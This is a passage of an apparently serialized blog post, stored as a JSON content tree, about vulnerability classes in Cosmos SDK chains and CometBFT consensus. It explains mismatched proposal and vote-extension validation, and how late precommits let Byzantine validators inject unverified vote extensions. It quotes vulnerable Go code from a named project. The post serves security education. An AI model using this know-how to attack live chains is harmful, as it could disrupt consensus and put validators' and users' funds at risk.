01,"props":89627,"children":89628},{"style":359},[89629],{"type":30,"value":377},{"type":24,"tag":301,"props":89631,"children":89632},{"style":369},[89633],{"type":30,"value":89634},"senderModule",{"type":24,"tag":301,"props":89636,"children":89637},{"style":10246},[89638],{"type":30,"value":42773},{"type":24,"tag":301,"props":89640,"children":89641},{"style":359},[89642],{"type":30,"value":377},{"type":24,"tag":301,"props":89644,"children":89645},{"style":369},[89646],{"type":30,"value":89647},"recipientAddr",{"type":24,"tag":301,"props":89649,"children":89650},{"style":10246},[89651],{"type":30,"value":85353},{"type":24,"tag":301,"props":89653,"children":89654},{"style":359},[89655],{"type":30,"value":206},{"type":24,"tag":301,"props":89657,"children":89658},{"style":10246},[89659],{"type":30,"value":89333},{"type":24,"tag":301,"props":89661,"children":89662},{"style":359},[89663],{"type":30,"value":377},{"type":24,"tag":301,"props":89665,"children":89666},{"style":369},[89667],{"type":30,"value":89668},"amt",{"type":24,"tag":301,"props":89670,"children":89671},{"style":10246},[89672],{"type":30,"value":85353},{"type":24,"tag":301,"props":89674,"children":89675},{"style":359},[89676],{"type":30,"value":206},{"type":24,"tag":301,"props":89678,"children":89679},{"style":10246},[89680],{"type":30,"value":89681},"Coins",{"type":24,"tag":301,"props":89683,"children":89684},{"style":359},[89685],{"type":30,"value":1729},{"type":24,"tag":301,"props":89687,"children":89688},{"class":303,"line":335},[89689,89693,89697],{"type":24,"tag":301,"props":89690,"children":89691},{"style":359},[89692],{"type":30,"value":911},{"type":24,"tag":301,"props":89694,"children":89695},{"style":10246},[89696],{"type":30,"value":21654},{"type":24,"tag":301,"props":89698,"children":89699},{"style":359},[89700],{"type":30,"value":3035},{"type":24,"tag":301,"props":89702,"children":89703},{"class":303,"line":344},[89704],{"type":24,"tag":301,"props":89705,"children":89706},{"style":385},[89707],{"type":30,"value":89708}," ...\n",{"type":24,"tag":301,"props":89710,"children":89711},{"class":303,"line":401},[89712,89716,89720,89724,89728,89732,89736],{"type":24,"tag":301,"props":89713,"children":89714},{"style":308},[89715],{"type":30,"value":22574},{"type":24,"tag":301,"props":89717,"children":89718},{"style":369},[89719],{"type":30,"value":87961},{"type":24,"tag":301,"props":89721,"children":89722},{"style":359},[89723],{"type":30,"value":206},{"type":24,"tag":301,"props":89725,"children":89726},{"style":314},[89727],{"type":30,"value":88364},{"type":24,"tag":301,"props":89729,"children":89730},{"style":359},[89731],{"type":30,"value":362},{"type":24,"tag":301,"props":89733,"children":89734},{"style":369},[89735],{"type":30,"value":89647},{"type":24,"tag":301,"props":89737,"children":89738},{"style":359},[89739],{"type":30,"value":398},{"type":24,"tag":301,"props":89741,"children":89742},{"class":303,"line":415},[89743,89747,89752,89756,89760,89764,89768,89772,89777,89781,89786,89790,89794],{"type":24,"tag":301,"props":89744,"children":89745},{"style":308},[89746],{"type":30,"value":45936},{"type":24,"tag":301,"props":89748,"children":89749},{"style":369},[89750],{"type":30,"value":89751}," errorsmod",{"type":24,"tag":301,"props":89753,"children":89754},{"style":359},[89755],{"type":30,"value":206},{"type":24,"tag":301,"props":89757,"children":89758},{"style":314},[89759],{"type":30,"value":87622},{"type":24,"tag":301,"props":89761,"children":89762},{"style":359},[89763],{"type":30,"value":362},{"type":24,"tag":301,"props":89765,"children":89766},{"style":369},[89767],{"type":30,"value":87284},{"type":24,"tag":301,"props":89769,"children":89770},{"style":359},[89771],{"type":30,"value":206},{"type":24,"tag":301,"props":89773,"children":89774},{"style":369},[89775],{"type":30,"value":89776},"ErrUnauthorized",{"type":24,"tag":301,"props":89778,"children":89779},{"style":359},[89780],{"type":30,"value":377},{"type":24,"tag":301,"props":89782,"children":89783},{"style":329},[89784],{"type":30,"value":89785},"\"%s is not allowed to receive funds\"",{"type":24,"tag":301,"props":89787,"children":89788},{"style":359},[89789],{"type":30,"value":377},{"type":24,"tag":301,"props":89791,"children":89792},{"style":369},[89793],{"type":30,"value":89647},{"type":24,"tag":301,"props":89795,"children":89796},{"style":359},[89797],{"type":30,"value":791},{"type":24,"tag":301,"props":89799,"children":89800},{"class":303,"line":439},[89801],{"type":24,"tag":301,"props":89802,"children":89803},{"style":359},[89804],{"type":30,"value":16401},{"type":24,"tag":301,"props":89806,"children":89807},{"class":303,"line":447},[89808],{"type":24,"tag":301,"props":89809,"children":89810},{"style":385},[89811],{"type":30,"value":89708},{"type":24,"tag":301,"props":89813,"children":89814},{"class":303,"line":476},[89815],{"type":24,"tag":301,"props":89816,"children":89817},{"style":359},[89818],{"type":30,"value":698},{"type":24,"tag":32,"props":89820,"children":89821},{},[89822,89824,89831],{"type":30,"value":89823},"This shows even well-known bug classes still resurface from time to time due to unforeseen invariant violations. Additional examples include ",{"type":24,"tag":188,"props":89825,"children":89828},{"href":89826,"rel":89827},"https://hackerone.com/reports/3018307",[192],[89829],{"type":30,"value":89830},"improper decimal handling in the group module",{"type":30,"value":206},{"type":24,"tag":43,"props":89833,"children":89835},{"id":89834},"same-same-but-different",[89836],{"type":30,"value":89837},"Same, Same... But Different",{"type":24,"tag":32,"props":89839,"children":89840},{},[89841,89843,89849,89850,89856,89857,89863,89864,89870],{"type":30,"value":89842},"Cosmos exposes several consensus-level interfaces, such as ",{"type":24,"tag":145,"props":89844,"children":89846},{"className":89845},[],[89847],{"type":30,"value":89848},"PrepareProposal",{"type":30,"value":377},{"type":24,"tag":145,"props":89851,"children":89853},{"className":89852},[],[89854],{"type":30,"value":89855},"ProcessProposal",{"type":30,"value":377},{"type":24,"tag":145,"props":89858,"children":89860},{"className":89859},[],[89861],{"type":30,"value":89862},"ExtendVote",{"type":30,"value":8410},{"type":24,"tag":145,"props":89865,"children":89867},{"className":89866},[],[89868],{"type":30,"value":89869},"VerifyVoteExtension",{"type":30,"value":89871},". These ABCI methods allow developers to customize how blocks are constructed, as well as inject supplementary data into each block.",{"type":24,"tag":32,"props":89873,"children":89874},{},[89875],{"type":30,"value":89876},"Two of the best-known attack surfaces are",{"type":24,"tag":6246,"props":89878,"children":89879},{},[89880,89909],{"type":24,"tag":2659,"props":89881,"children":89882},{},[89883,89888,89889,89894,89896,89901,89902,89907],{"type":24,"tag":145,"props":89884,"children":89886},{"className":89885},[],[89887],{"type":30,"value":89848},{"type":30,"value":873},{"type":24,"tag":145,"props":89890,"children":89892},{"className":89891},[],[89893],{"type":30,"value":89862},{"type":30,"value":89895},") outputs being rejected due to ",{"type":24,"tag":145,"props":89897,"children":89899},{"className":89898},[],[89900],{"type":30,"value":89855},{"type":30,"value":873},{"type":24,"tag":145,"props":89903,"children":89905},{"className":89904},[],[89906],{"type":30,"value":89869},{"type":30,"value":89908},") over-validating, resulting in liveness failures.",{"type":24,"tag":2659,"props":89910,"children":89911},{},[89912,89914,89919,89920,89925,89927,89932,89933,89938],{"type":30,"value":89913},"Malicious proposals and vote extensions not created through the ",{"type":24,"tag":145,"props":89915,"children":89917},{"className":89916},[],[89918],{"type":30,"value":89848},{"type":30,"value":873},{"type":24,"tag":145,"props":89921,"children":89923},{"className":89922},[],[89924],{"type":30,"value":89862},{"type":30,"value":89926},") are accepted due to ",{"type":24,"tag":145,"props":89928,"children":89930},{"className":89929},[],[89931],{"type":30,"value":89855},{"type":30,"value":873},{"type":24,"tag":145,"props":89934,"children":89936},{"className":89935},[],[89937],{"type":30,"value":89869},{"type":30,"value":89939},") under-validating.",{"type":24,"tag":32,"props":89941,"children":89942},{},[89943],{"type":30,"value":89944},"In essence, any difference in pairs of handlers will likely lead to security issues.",{"type":24,"tag":32,"props":89946,"children":89947},{},[89948,89950,89956,89958,89963],{"type":30,"value":89949},"There are also a few lesser known variants of these issues. One instance is the validation of ",{"type":24,"tag":145,"props":89951,"children":89953},{"className":89952},[],[89954],{"type":30,"value":89955},"VoteExtensions",{"type":30,"value":89957}," within ",{"type":24,"tag":145,"props":89959,"children":89961},{"className":89960},[],[89962],{"type":30,"value":89848},{"type":30,"value":89964},". To provide context, we start with a primer on the CometBTF consensus and vote extensions.",{"type":24,"tag":32,"props":89966,"children":89967},{},[89968,89970,89975,89977,89982],{"type":30,"value":89969},"Consensus starts with a leader creating a proposal and then broadcasting it to each validator. Validators then proceed to vote on whether or not to accept the proposal. During the voting phase, ",{"type":24,"tag":145,"props":89971,"children":89973},{"className":89972},[],[89974],{"type":30,"value":89862},{"type":30,"value":89976}," is called to attach additional data to the votes. Once a validator collects enough valid votes that pass ",{"type":24,"tag":145,"props":89978,"children":89980},{"className":89979},[],[89981],{"type":30,"value":89869},{"type":30,"value":89983},", a proposal is considered accepted and can be committed. After committing the proposal, a new leader starts to create the next proposal, bringing us back to the point where we started.",{"type":24,"tag":32,"props":89985,"children":89986},{},[89987,89989,89994],{"type":30,"value":89988},"So, where are the attached vote extension data used? It turns out a leader should include the vote extensions of the previous consensus round in its proposal. It might be tempting to conclude that all vote extensions an honest leader accepted have passed the ",{"type":24,"tag":145,"props":89990,"children":89992},{"className":89991},[],[89993],{"type":30,"value":89869},{"type":30,"value":89995}," check and are therefore valid. Thus, we can directly inject all vote extensions into our proposal.",{"type":24,"tag":32,"props":89997,"children":89998},{},[89999,90001,90006,90008,90014],{"type":30,"value":90000},"Unfortunately, CometBTF directly accepts late precommits without passing them through ",{"type":24,"tag":145,"props":90002,"children":90004},{"className":90003},[],[90005],{"type":30,"value":89869},{"type":30,"value":90007},". This exposes a time window where Byzantine validators can smuggle malicious vote into the next leader's cache, luring the leader into including invalid vote extensions into its ",{"type":24,"tag":145,"props":90009,"children":90011},{"className":90010},[],[90012],{"type":30,"value":90013},"Proposal",{"type":30,"value":206},{"type":24,"tag":291,"props":90016,"children":90018},{"code":90017,"language":82877,"meta":7,"className":82878,"style":7},"func (cs *State) addVote(vote *types.Vote, peerID p2p.ID) (added bool, err error) {\n ...\n\n // A precommit for the previous height?\n // These come in while we wait timeoutCommit\n if vote.Height+1 == cs.Height && vote.Type == types.PrecommitType {\n ...\n // Late precommits are not checked by VerifyVoteExtension\n added, err = cs.LastCommit.AddVote(vote)\n ...\n return added, err\n }\n extEnabled := cs.state.ConsensusParams.Feature.VoteExtensionsEnabled(vote.Height)\n if extEnabled {\n ...\n if vote.Type == types.PrecommitType && !vote.BlockID.IsNil() &&\n !bytes.Equal(vote.ValidatorAddress, myAddr) { // Skip the VerifyVoteExtension call if the vote was issued by this validator.\n ...\n err := cs.blockExec.VerifyVoteExtension(context.TODO(), vote)\n ...\n }\n } else if {\n ...\n }\n ...\n}\n",[90019],{"type":24,"tag":145,"props":90020,"children":90021},{"__ignoreMap":7},[90022,90134,90141,90148,90156,90164,90248,90255,90263,90317,90324,90345,90352,90424,90440,90447,90521,90577,90584,90646,90653,90660,90679,90686,90693,90700],{"type":24,"tag":301,"props":90023,"children":90024},{"class":303,"line":304},[90025,90029,90033,90038,90042,90047,90051,90056,90060,90065,90069,90073,90077,90082,90086,90091,90096,90100,90105,90109,90114,90118,90122,90126,90130],{"type":24,"tag":301,"props":90026,"children":90027},{"style":348},[90028],{"type":30,"value":83013},{"type":24,"tag":301,"props":90030,"children":90031},{"style":359},[90032],{"type":30,"value":873},{"type":24,"tag":301,"props":90034,"children":90035},{"style":369},[90036],{"type":30,"value":90037},"cs ",{"type":24,"tag":301,"props":90039,"children":90040},{"style":385},[90041],{"type":30,"value":772},{"type":24,"tag":301,"props":90043,"children":90044},{"style":10246},[90045],{"type":30,"value":90046},"State",{"type":24,"tag":301,"props":90048,"children":90049},{"style":359},[90050],{"type":30,"value":911},{"type":24,"tag":301,"props":90052,"children":90053},{"style":314},[90054],{"type":30,"value":90055},"addVote",{"type":24,"tag":301,"props":90057,"children":90058},{"style":359},[90059],{"type":30,"value":362},{"type":24,"tag":301,"props":90061,"children":90062},{"style":369},[90063],{"type":30,"value":90064},"vote",{"type":24,"tag":301,"props":90066,"children":90067},{"style":385},[90068],{"type":30,"value":431},{"type":24,"tag":301,"props":90070,"children":90071},{"style":10246},[90072],{"type":30,"value":12579},{"type":24,"tag":301,"props":90074,"children":90075},{"style":359},[90076],{"type":30,"value":206},{"type":24,"tag":301,"props":90078,"children":90079},{"style":10246},[90080],{"type":30,"value":90081},"Vote",{"type":24,"tag":301,"props":90083,"children":90084},{"style":359},[90085],{"type":30,"value":377},{"type":24,"tag":301,"props":90087,"children":90088},{"style":369},[90089],{"type":30,"value":90090},"peerID",{"type":24,"tag":301,"props":90092,"children":90093},{"style":10246},[90094],{"type":30,"value":90095}," p2p",{"type":24,"tag":301,"props":90097,"children":90098},{"style":359},[90099],{"type":30,"value":206},{"type":24,"tag":301,"props":90101,"children":90102},{"style":10246},[90103],{"type":30,"value":90104},"ID",{"type":24,"tag":301,"props":90106,"children":90107},{"style":359},[90108],{"type":30,"value":83095},{"type":24,"tag":301,"props":90110,"children":90111},{"style":369},[90112],{"type":30,"value":90113},"added",{"type":24,"tag":301,"props":90115,"children":90116},{"style":10246},[90117],{"type":30,"value":18848},{"type":24,"tag":301,"props":90119,"children":90120},{"style":359},[90121],{"type":30,"value":377},{"type":24,"tag":301,"props":90123,"children":90124},{"style":369},[90125],{"type":30,"value":55155},{"type":24,"tag":301,"props":90127,"children":90128},{"style":10246},[90129],{"type":30,"value":21667},{"type":24,"tag":301,"props":90131,"children":90132},{"style":359},[90133],{"type":30,"value":398},{"type":24,"tag":301,"props":90135,"children":90136},{"class":303,"line":320},[90137],{"type":24,"tag":301,"props":90138,"children":90139},{"style":385},[90140],{"type":30,"value":27110},{"type":24,"tag":301,"props":90142,"children":90143},{"class":303,"line":335},[90144],{"type":24,"tag":301,"props":90145,"children":90146},{"emptyLinePlaceholder":16},[90147],{"type":30,"value":341},{"type":24,"tag":301,"props":90149,"children":90150},{"class":303,"line":344},[90151],{"type":24,"tag":301,"props":90152,"children":90153},{"style":1062},[90154],{"type":30,"value":90155}," // A precommit for the previous height?\n",{"type":24,"tag":301,"props":90157,"children":90158},{"class":303,"line":401},[90159],{"type":24,"tag":301,"props":90160,"children":90161},{"style":1062},[90162],{"type":30,"value":90163}," // These come in while we wait timeoutCommit\n",{"type":24,"tag":301,"props":90165,"children":90166},{"class":303,"line":415},[90167,90171,90176,90180,90185,90189,90193,90197,90202,90206,90210,90214,90218,90222,90227,90231,90235,90239,90244],{"type":24,"tag":301,"props":90168,"children":90169},{"style":308},[90170],{"type":30,"value":453},{"type":24,"tag":301,"props":90172,"children":90173},{"style":369},[90174],{"type":30,"value":90175}," vote",{"type":24,"tag":301,"props":90177,"children":90178},{"style":359},[90179],{"type":30,"value":206},{"type":24,"tag":301,"props":90181,"children":90182},{"style":369},[90183],{"type":30,"value":90184},"Height",{"type":24,"tag":301,"props":90186,"children":90187},{"style":385},[90188],{"type":30,"value":11206},{"type":24,"tag":301,"props":90190,"children":90191},{"style":466},[90192],{"type":30,"value":546},{"type":24,"tag":301,"props":90194,"children":90195},{"style":385},[90196],{"type":30,"value":2460},{"type":24,"tag":301,"props":90198,"children":90199},{"style":369},[90200],{"type":30,"value":90201}," cs",{"type":24,"tag":301,"props":90203,"children":90204},{"style":359},[90205],{"type":30,"value":206},{"type":24,"tag":301,"props":90207,"children":90208},{"style":369},[90209],{"type":30,"value":90184},{"type":24,"tag":301,"props":90211,"children":90212},{"style":385},[90213],{"type":30,"value":20977},{"type":24,"tag":301,"props":90215,"children":90216},{"style":369},[90217],{"type":30,"value":90175},{"type":24,"tag":301,"props":90219,"children":90220},{"style":359},[90221],{"type":30,"value":206},{"type":24,"tag":301,"props":90223,"children":90224},{"style":369},[90225],{"type":30,"value":90226},"Type",{"type":24,"tag":301,"props":90228,"children":90229},{"style":385},[90230],{"type":30,"value":2460},{"type":24,"tag":301,"props":90232,"children":90233},{"style":369},[90234],{"type":30,"value":84887},{"type":24,"tag":301,"props":90236,"children":90237},{"style":359},[90238],{"type":30,"value":206},{"type":24,"tag":301,"props":90240,"children":90241},{"style":369},[90242],{"type":30,"value":90243},"PrecommitType",{"type":24,"tag":301,"props":90245,"children":90246},{"style":359},[90247],{"type":30,"value":3035},{"type":24,"tag":301,"props":90249,"children":90250},{"class":303,"line":439},[90251],{"type":24,"tag":301,"props":90252,"children":90253},{"style":385},[90254],{"type":30,"value":88547},{"type":24,"tag":301,"props":90256,"children":90257},{"class":303,"line":447},[90258],{"type":24,"tag":301,"props":90259,"children":90260},{"style":1062},[90261],{"type":30,"value":90262}," // Late precommits are not checked by VerifyVoteExtension\n",{"type":24,"tag":301,"props":90264,"children":90265},{"class":303,"line":476},[90266,90271,90275,90279,90283,90287,90291,90296,90300,90305,90309,90313],{"type":24,"tag":301,"props":90267,"children":90268},{"style":369},[90269],{"type":30,"value":90270}," added",{"type":24,"tag":301,"props":90272,"children":90273},{"style":359},[90274],{"type":30,"value":377},{"type":24,"tag":301,"props":90276,"children":90277},{"style":369},[90278],{"type":30,"value":55155},{"type":24,"tag":301,"props":90280,"children":90281},{"style":385},[90282],{"type":30,"value":2537},{"type":24,"tag":301,"props":90284,"children":90285},{"style":369},[90286],{"type":30,"value":90201},{"type":24,"tag":301,"props":90288,"children":90289},{"style":359},[90290],{"type":30,"value":206},{"type":24,"tag":301,"props":90292,"children":90293},{"style":369},[90294],{"type":30,"value":90295},"LastCommit",{"type":24,"tag":301,"props":90297,"children":90298},{"style":359},[90299],{"type":30,"value":206},{"type":24,"tag":301,"props":90301,"children":90302},{"style":314},[90303],{"type":30,"value":90304},"AddVote",{"type":24,"tag":301,"props":90306,"children":90307},{"style":359},[90308],{"type":30,"value":362},{"type":24,"tag":301,"props":90310,"children":90311},{"style":369},[90312],{"type":30,"value":90064},{"type":24,"tag":301,"props":90314,"children":90315},{"style":359},[90316],{"type":30,"value":791},{"type":24,"tag":301,"props":90318,"children":90319},{"class":303,"line":495},[90320],{"type":24,"tag":301,"props":90321,"children":90322},{"style":385},[90323],{"type":30,"value":88547},{"type":24,"tag":301,"props":90325,"children":90326},{"class":303,"line":504},[90327,90331,90336,90340],{"type":24,"tag":301,"props":90328,"children":90329},{"style":308},[90330],{"type":30,"value":482},{"type":24,"tag":301,"props":90332,"children":90333},{"style":369},[90334],{"type":30,"value":90335}," added",{"type":24,"tag":301,"props":90337,"children":90338},{"style":359},[90339],{"type":30,"value":377},{"type":24,"tag":301,"props":90341,"children":90342},{"style":369},[90343],{"type":30,"value":90344},"err\n",{"type":24,"tag":301,"props":90346,"children":90347},{"class":303,"line":512},[90348],{"type":24,"tag":301,"props":90349,"children":90350},{"style":359},[90351],{"type":30,"value":501},{"type":24,"tag":301,"props":90353,"children":90354},{"class":303,"line":592},[90355,90360,90364,90368,90372,90377,90381,90386,90390,90395,90399,90404,90408,90412,90416,90420],{"type":24,"tag":301,"props":90356,"children":90357},{"style":369},[90358],{"type":30,"value":90359}," extEnabled",{"type":24,"tag":301,"props":90361,"children":90362},{"style":385},[90363],{"type":30,"value":83129},{"type":24,"tag":301,"props":90365,"children":90366},{"style":369},[90367],{"type":30,"value":90201},{"type":24,"tag":301,"props":90369,"children":90370},{"style":359},[90371],{"type":30,"value":206},{"type":24,"tag":301,"props":90373,"children":90374},{"style":369},[90375],{"type":30,"value":90376},"state",{"type":24,"tag":301,"props":90378,"children":90379},{"style":359},[90380],{"type":30,"value":206},{"type":24,"tag":301,"props":90382,"children":90383},{"style":369},[90384],{"type":30,"value":90385},"ConsensusParams",{"type":24,"tag":301,"props":90387,"children":90388},{"style":359},[90389],{"type":30,"value":206},{"type":24,"tag":301,"props":90391,"children":90392},{"style":369},[90393],{"type":30,"value":90394},"Feature",{"type":24,"tag":301,"props":90396,"children":90397},{"style":359},[90398],{"type":30,"value":206},{"type":24,"tag":301,"props":90400,"children":90401},{"style":314},[90402],{"type":30,"value":90403},"VoteExtensionsEnabled",{"type":24,"tag":301,"props":90405,"children":90406},{"style":359},[90407],{"type":30,"value":362},{"type":24,"tag":301,"props":90409,"children":90410},{"style":369},[90411],{"type":30,"value":90064},{"type":24,"tag":301,"props":90413,"children":90414},{"style":359},[90415],{"type":30,"value":206},{"type":24,"tag":301,"props":90417,"children":90418},{"style":369},[90419],{"type":30,"value":90184},{"type":24,"tag":301,"props":90421,"children":90422},{"style":359},[90423],{"type":30,"value":791},{"type":24,"tag":301,"props":90425,"children":90426},{"class":303,"line":619},[90427,90431,90436],{"type":24,"tag":301,"props":90428,"children":90429},{"style":308},[90430],{"type":30,"value":453},{"type":24,"tag":301,"props":90432,"children":90433},{"style":369},[90434],{"type":30,"value":90435}," extEnabled",{"type":24,"tag":301,"props":90437,"children":90438},{"style":359},[90439],{"type":30,"value":3035},{"type":24,"tag":301,"props":90441,"children":90442},{"class":303,"line":635},[90443],{"type":24,"tag":301,"props":90444,"children":90445},{"style":385},[90446],{"type":30,"value":88547},{"type":24,"tag":301,"props":90448,"children":90449},{"class":303,"line":643},[90450,90454,90458,90462,90466,90470,90474,90478,90482,90486,90490,90494,90498,90503,90507,90512,90516],{"type":24,"tag":301,"props":90451,"children":90452},{"style":308},[90453],{"type":30,"value":3285},{"type":24,"tag":301,"props":90455,"children":90456},{"style":369},[90457],{"type":30,"value":90175},{"type":24,"tag":301,"props":90459,"children":90460},{"style":359},[90461],{"type":30,"value":206},{"type":24,"tag":301,"props":90463,"children":90464},{"style":369},[90465],{"type":30,"value":90226},{"type":24,"tag":301,"props":90467,"children":90468},{"style":385},[90469],{"type":30,"value":2460},{"type":24,"tag":301,"props":90471,"children":90472},{"style":369},[90473],{"type":30,"value":84887},{"type":24,"tag":301,"props":90475,"children":90476},{"style":359},[90477],{"type":30,"value":206},{"type":24,"tag":301,"props":90479,"children":90480},{"style":369},[90481],{"type":30,"value":90243},{"type":24,"tag":301,"props":90483,"children":90484},{"style":385},[90485],{"type":30,"value":20977},{"type":24,"tag":301,"props":90487,"children":90488},{"style":385},[90489],{"type":30,"value":19659},{"type":24,"tag":301,"props":90491,"children":90492},{"style":369},[90493],{"type":30,"value":90064},{"type":24,"tag":301,"props":90495,"children":90496},{"style":359},[90497],{"type":30,"value":206},{"type":24,"tag":301,"props":90499,"children":90500},{"style":369},[90501],{"type":30,"value":90502},"BlockID",{"type":24,"tag":301,"props":90504,"children":90505},{"style":359},[90506],{"type":30,"value":206},{"type":24,"tag":301,"props":90508,"children":90509},{"style":314},[90510],{"type":30,"value":90511},"IsNil",{"type":24,"tag":301,"props":90513,"children":90514},{"style":359},[90515],{"type":30,"value":20835},{"type":24,"tag":301,"props":90517,"children":90518},{"style":385},[90519],{"type":30,"value":90520},"&&\n",{"type":24,"tag":301,"props":90522,"children":90523},{"class":303,"line":652},[90524,90529,90534,90538,90542,90546,90550,90554,90559,90563,90568,90572],{"type":24,"tag":301,"props":90525,"children":90526},{"style":385},[90527],{"type":30,"value":90528}," !",{"type":24,"tag":301,"props":90530,"children":90531},{"style":369},[90532],{"type":30,"value":90533},"bytes",{"type":24,"tag":301,"props":90535,"children":90536},{"style":359},[90537],{"type":30,"value":206},{"type":24,"tag":301,"props":90539,"children":90540},{"style":314},[90541],{"type":30,"value":89003},{"type":24,"tag":301,"props":90543,"children":90544},{"style":359},[90545],{"type":30,"value":362},{"type":24,"tag":301,"props":90547,"children":90548},{"style":369},[90549],{"type":30,"value":90064},{"type":24,"tag":301,"props":90551,"children":90552},{"style":359},[90553],{"type":30,"value":206},{"type":24,"tag":301,"props":90555,"children":90556},{"style":369},[90557],{"type":30,"value":90558},"ValidatorAddress",{"type":24,"tag":301,"props":90560,"children":90561},{"style":359},[90562],{"type":30,"value":377},{"type":24,"tag":301,"props":90564,"children":90565},{"style":369},[90566],{"type":30,"value":90567},"myAddr",{"type":24,"tag":301,"props":90569,"children":90570},{"style":359},[90571],{"type":30,"value":30745},{"type":24,"tag":301,"props":90573,"children":90574},{"style":1062},[90575],{"type":30,"value":90576},"// Skip the VerifyVoteExtension call if the vote was issued by this validator.\n",{"type":24,"tag":301,"props":90578,"children":90579},{"class":303,"line":666},[90580],{"type":24,"tag":301,"props":90581,"children":90582},{"style":385},[90583],{"type":30,"value":89223},{"type":24,"tag":301,"props":90585,"children":90586},{"class":303,"line":674},[90587,90591,90595,90599,90603,90608,90612,90616,90620,90625,90629,90634,90638,90642],{"type":24,"tag":301,"props":90588,"children":90589},{"style":369},[90590],{"type":30,"value":89041},{"type":24,"tag":301,"props":90592,"children":90593},{"style":385},[90594],{"type":30,"value":83129},{"type":24,"tag":301,"props":90596,"children":90597},{"style":369},[90598],{"type":30,"value":90201},{"type":24,"tag":301,"props":90600,"children":90601},{"style":359},[90602],{"type":30,"value":206},{"type":24,"tag":301,"props":90604,"children":90605},{"style":369},[90606],{"type":30,"value":90607},"blockExec",{"type":24,"tag":301,"props":90609,"children":90610},{"style":359},[90611],{"type":30,"value":206},{"type":24,"tag":301,"props":90613,"children":90614},{"style":314},[90615],{"type":30,"value":89869},{"type":24,"tag":301,"props":90617,"children":90618},{"style":359},[90619],{"type":30,"value":362},{"type":24,"tag":301,"props":90621,"children":90622},{"style":369},[90623],{"type":30,"value":90624},"context",{"type":24,"tag":301,"props":90626,"children":90627},{"style":359},[90628],{"type":30,"value":206},{"type":24,"tag":301,"props":90630,"children":90631},{"style":314},[90632],{"type":30,"value":90633},"TODO",{"type":24,"tag":301,"props":90635,"children":90636},{"style":359},[90637],{"type":30,"value":25153},{"type":24,"tag":301,"props":90639,"children":90640},{"style":369},[90641],{"type":30,"value":90064},{"type":24,"tag":301,"props":90643,"children":90644},{"style":359},[90645],{"type":30,"value":791},{"type":24,"tag":301,"props":90647,"children":90648},{"class":303,"line":692},[90649],{"type":24,"tag":301,"props":90650,"children":90651},{"style":385},[90652],{"type":30,"value":89223},{"type":24,"tag":301,"props":90654,"children":90655},{"class":303,"line":3631},[90656],{"type":24,"tag":301,"props":90657,"children":90658},{"style":359},[90659],{"type":30,"value":3345},{"type":24,"tag":301,"props":90661,"children":90662},{"class":303,"line":3639},[90663,90667,90671,90675],{"type":24,"tag":301,"props":90664,"children":90665},{"style":359},[90666],{"type":30,"value":22565},{"type":24,"tag":301,"props":90668,"children":90669},{"style":308},[90670],{"type":30,"value":10144},{"type":24,"tag":301,"props":90672,"children":90673},{"style":308},[90674],{"type":30,"value":22574},{"type":24,"tag":301,"props":90676,"children":90677},{"style":359},[90678],{"type":30,"value":3035},{"type":24,"tag":301,"props":90680,"children":90681},{"class":303,"line":3647},[90682],{"type":24,"tag":301,"props":90683,"children":90684},{"style":385},[90685],{"type":30,"value":88547},{"type":24,"tag":301,"props":90687,"children":90688},{"class":303,"line":3685},[90689],{"type":24,"tag":301,"props":90690,"children":90691},{"style":359},[90692],{"type":30,"value":501},{"type":24,"tag":301,"props":90694,"children":90695},{"class":303,"line":3713},[90696],{"type":24,"tag":301,"props":90697,"children":90698},{"style":385},[90699],{"type":30,"value":27110},{"type":24,"tag":301,"props":90701,"children":90702},{"class":303,"line":3721},[90703],{"type":24,"tag":301,"props":90704,"children":90705},{"style":359},[90706],{"type":30,"value":698},{"type":24,"tag":32,"props":90708,"children":90709},{},[90710],{"type":30,"value":90711},"If developers are not aware of the subtle details regarding vote extension handling in CometBTF, it is quite easy to overlook implementing protections against these attacks.",{"type":24,"tag":80,"props":90713,"children":90715},{"id":90714},"real-world-examples-4",[90716],{"type":30,"value":83401},{"type":24,"tag":32,"props":90718,"children":90719},{},[90720,90722,90727,90729,90735,90737,90743],{"type":30,"value":90721},"An example of the bug we just described is shown here. ",{"type":24,"tag":145,"props":90723,"children":90725},{"className":90724},[],[90726],{"type":30,"value":89848},{"type":30,"value":90728}," only checks that each vote is properly signed by a validator in ",{"type":24,"tag":145,"props":90730,"children":90732},{"className":90731},[],[90733],{"type":30,"value":90734},"ValidateVoteExtension",{"type":30,"value":90736}," but does not verify it against the rules in ",{"type":24,"tag":145,"props":90738,"children":90740},{"className":90739},[],[90741],{"type":30,"value":90742},"VerifyVoteExtention.",{"type":30,"value":90744}," Therefore leaving the leader vulnerable to accepting malicious vote extensions in their proposals.",{"type":24,"tag":32,"props":90746,"children":90747},{},[90748],{"type":24,"tag":188,"props":90749,"children":90752},{"href":90750,"rel":90751},"https://github.com/sedaprotocol/seda-chain/blob/66c1b593fa81c7d443ab5fa82757b45e68597f49/app/abci/handlers.go#L180",[192],[90753],{"type":30,"value":83451},{"type":24,"tag":291,"props":90755,"children":90757},{"code":90756,"language":82877,"meta":7,"className":82878,"style":7},"func (h *Handlers) PrepareProposalHandler() sdk.PrepareProposalHandler {\n return func(ctx sdk.Context, req *abcitypes.RequestPrepareProposal) (*abcitypes.ResponsePrepareProposal, error) {\n ...\n var injection []byte\n if req.Height > ctx.ConsensusParams().Abci.VoteExtensionsEnableHeight && collectSigs {\n //Fails to verify vote extensions with VerifyVoteExtension rules\n err := baseapp.ValidateVoteExtensions(ctx, h.stakingKeeper, req.Height, ctx.ChainID(), req.LocalLastCommit)\n if err != nil {\n return nil, err\n }\n injection, err = json.Marshal(req.LocalLastCommit)\n if err != nil {\n h.logger.Error(\"failed to marshal extended votes\", \"err\", err)\n return nil, err\n }\n ...\n }\n defaultRes, err := h.defaultPrepareProposal(ctx, req)\n ...\n proposalTxs := defaultRes.Txs\n if injection != nil {\n proposalTxs = append([][]byte{injection}, proposalTxs...)\n h.logger.Debug(\"injected local last commit\", \"height\", req.Height)\n }\n return &abcitypes.ResponsePrepareProposal{\n Txs: proposalTxs,\n }, nil\n 